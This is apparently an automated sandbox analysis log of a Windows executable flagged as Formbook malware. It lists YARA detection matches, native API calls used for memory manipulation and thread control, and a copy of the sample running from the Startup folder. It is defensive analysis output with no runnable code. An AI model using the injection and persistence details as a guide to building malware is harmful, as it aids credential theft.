          Source: 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.503765338.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000001F.00000002.439648635.00000000004C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.368138298.0000000003896000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.368427184.0000000003913000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.388561440.0000000000B40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.438147328.0000000000C40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 21.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 23.2.f5cZJ0WC0H.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C438E8 NtQueryInformationProcess,18_2_04C438E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C438E3 NtQueryInformationProcess,18_2_04C438E3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_050238E8 NtQueryInformationProcess,19_2_050238E8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_050238E3 NtQueryInformationProcess,19_2_050238E3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041A050 NtClose,21_2_0041A050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041A100 NtAllocateVirtualMemory,21_2_0041A100
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00419F20 NtCreateFile,21_2_00419F20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00419FD0 NtReadFile,21_2_00419FD0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041A04E NtClose,21_2_0041A04E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041A0FA NtAllocateVirtualMemory,21_2_0041A0FA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00419F72 NtCreateFile,21_2_00419F72
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00419FCB NtReadFile,21_2_00419FCB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159910 NtAdjustPrivilegesToken,LdrInitializeThunk,21_2_01159910
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011599A0 NtCreateSection,LdrInitializeThunk,21_2_011599A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159840 NtDelayExecution,LdrInitializeThunk,21_2_01159840
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159860 NtQuerySystemInformation,LdrInitializeThunk,21_2_01159860
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011598F0 NtReadVirtualMemory,LdrInitializeThunk,21_2_011598F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159A00 NtProtectVirtualMemory,LdrInitializeThunk,21_2_01159A00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159A20 NtResumeThread,LdrInitializeThunk,21_2_01159A20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159A50 NtCreateFile,LdrInitializeThunk,21_2_01159A50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159540 NtReadFile,LdrInitializeThunk,21_2_01159540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011595D0 NtClose,LdrInitializeThunk,21_2_011595D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159710 NtQueryInformationToken,LdrInitializeThunk,21_2_01159710
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159780 NtMapViewOfSection,LdrInitializeThunk,21_2_01159780
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011597A0 NtUnmapViewOfSection,LdrInitializeThunk,21_2_011597A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159660 NtAllocateVirtualMemory,LdrInitializeThunk,21_2_01159660
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011596E0 NtFreeVirtualMemory,LdrInitializeThunk,21_2_011596E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159950 NtQueueApcThread,21_2_01159950
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011599D0 NtCreateProcessEx,21_2_011599D0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159820 NtEnumerateKey,21_2_01159820
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115B040 NtSuspendThread,21_2_0115B040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011598A0 NtWriteVirtualMemory,21_2_011598A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159B00 NtSetValueKey,21_2_01159B00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115A3B0 NtGetContextThread,21_2_0115A3B0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159A10 NtQuerySection,21_2_01159A10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159A80 NtOpenDirectoryObject,21_2_01159A80
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115AD30 NtSetContextThread,21_2_0115AD30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159520 NtWaitForSingleObject,21_2_01159520
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159560 NtWriteFile,21_2_01159560
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011595F0 NtQueryInformationFile,21_2_011595F0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115A710 NtOpenProcessToken,21_2_0115A710
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159730 NtQueryVirtualMemory,21_2_01159730
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0115A770 NtOpenThread,21_2_0115A770
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159770 NtSetInformationFile,21_2_01159770
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159760 NtOpenProcess,21_2_01159760
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159FE0 NtCreateMutant,21_2_01159FE0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159610 NtEnumerateValueKey,21_2_01159610
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159650 NtQueryValueKey,21_2_01159650
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01159670 NtQueryInformationProcess,21_2_01159670
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011596D0 NtCreateKey,21_2_011596D0
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_019491B81_2_019491B8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_019496C01_2_019496C0
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_01947A901_2_01947A90
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_0194CEC81_2_0194CEC8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_019491C81_2_019491C8
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_0194F1281_2_0194F128
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_0194D3781_2_0194D378
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_0194D3691_2_0194D369
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_0194F9281_2_0194F928
          Source: C:\Users\user\Desktop\f5cZJ0WC0H.exeCode function: 1_2_00F420501_2_00F42050
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_05338B685_2_05338B68
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_05338B585_2_05338B58
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008C91B818_2_008C91B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008C7A9018_2_008C7A90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CD01018_2_008CD010
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008C91C818_2_008C91C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CF12818_2_008CF128
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008CD36918_2_008CD369
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_008C96C018_2_008C96C0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C4BFF818_2_04C4BFF8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C431C818_2_04C431C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C4614018_2_04C46140
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C452A318_2_04C452A3
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C452A818_2_04C452A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C4BFE818_2_04C4BFE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_04C46B7018_2_04C46B70
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 18_2_0023205018_2_00232050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_010191C819_2_010191C8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_010196C019_2_010196C0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_01017A9019_2_01017A90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0101CEC819_2_0101CEC8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0101F11719_2_0101F117
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_010191B819_2_010191B8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0101D36B19_2_0101D36B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0101D37819_2_0101D378
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0101F92819_2_0101F928
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_05020D0019_2_05020D00
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502BFF819_2_0502BFF8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_050291F119_2_050291F1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502004019_2_05020040
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_05023A0819_2_05023A08
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_05022F4819_2_05022F48
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502BFE819_2_0502BFE8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502614019_2_05026140
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502486019_2_05024860
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_05026B7019_2_05026B70
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0502529919_2_05025299
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_050252A819_2_050252A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 19_2_0069205019_2_00692050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0040103021_2_00401030
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D99721_2_0041D997
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D20B21_2_0041D20B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00402D8721_2_00402D87
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00402D9021_2_00402D90
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00409E3021_2_00409E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0041D6BE21_2_0041D6BE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_00402FB021_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0111F90021_2_0111F900
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113412021_2_01134120
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D100221_2_011D1002
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011EE82421_2_011EE824
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112B09021_2_0112B090
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011420A021_2_011420A0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E20A821_2_011E20A8
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E28EC21_2_011E28EC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E2B2821_2_011E2B28
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114EBB021_2_0114EBB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D03DA21_2_011D03DA
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DDBD221_2_011DDBD2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E22AE21_2_011E22AE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E2D0721_2_011E2D07
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01110D2021_2_01110D20
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E1D5521_2_011E1D55
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114258121_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E25DD21_2_011E25DD
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112D5E021_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112841F21_2_0112841F
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DD46621_2_011DD466
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011EDFCE21_2_011EDFCE
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E1FF121_2_011E1FF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DD61621_2_011DD616
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01136E3021_2_01136E30
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E2EF721_2_011E2EF7
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0066205021_2_00662050
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: String function: 0111B150 appears 35 times
          Source: f5cZJ0WC0H.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: f5cZJ0WC0H.exe, 00000001.00000000.234539000.0000000000FA0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000001.00000002.246128519.0000000004389000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000000.333713010.0000000000290000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000002.363047029.00000000006F6000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000012.00000002.367211386.0000000003749000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.376654293.0000000000AF6000.00000004.00000010.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.376445315.00000000006F0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000013.00000002.382240548.0000000003989000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStub.dll4 vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000015.00000002.439007026.000000000120F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000015.00000002.437545116.00000000006C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000002.391999414.000000000133F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000000.372579063.0000000000680000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exe, 00000017.00000002.388405020.00000000007F4000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameHelp.Exej% vs f5cZJ0WC0H.exe
          Source: f5cZJ0WC0H.exeBinary or memory string: OriginalFilenameTesteconnect.exe: vs f5cZJ0WC0H.exe
          Source: 00000017.00000002.387510478.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
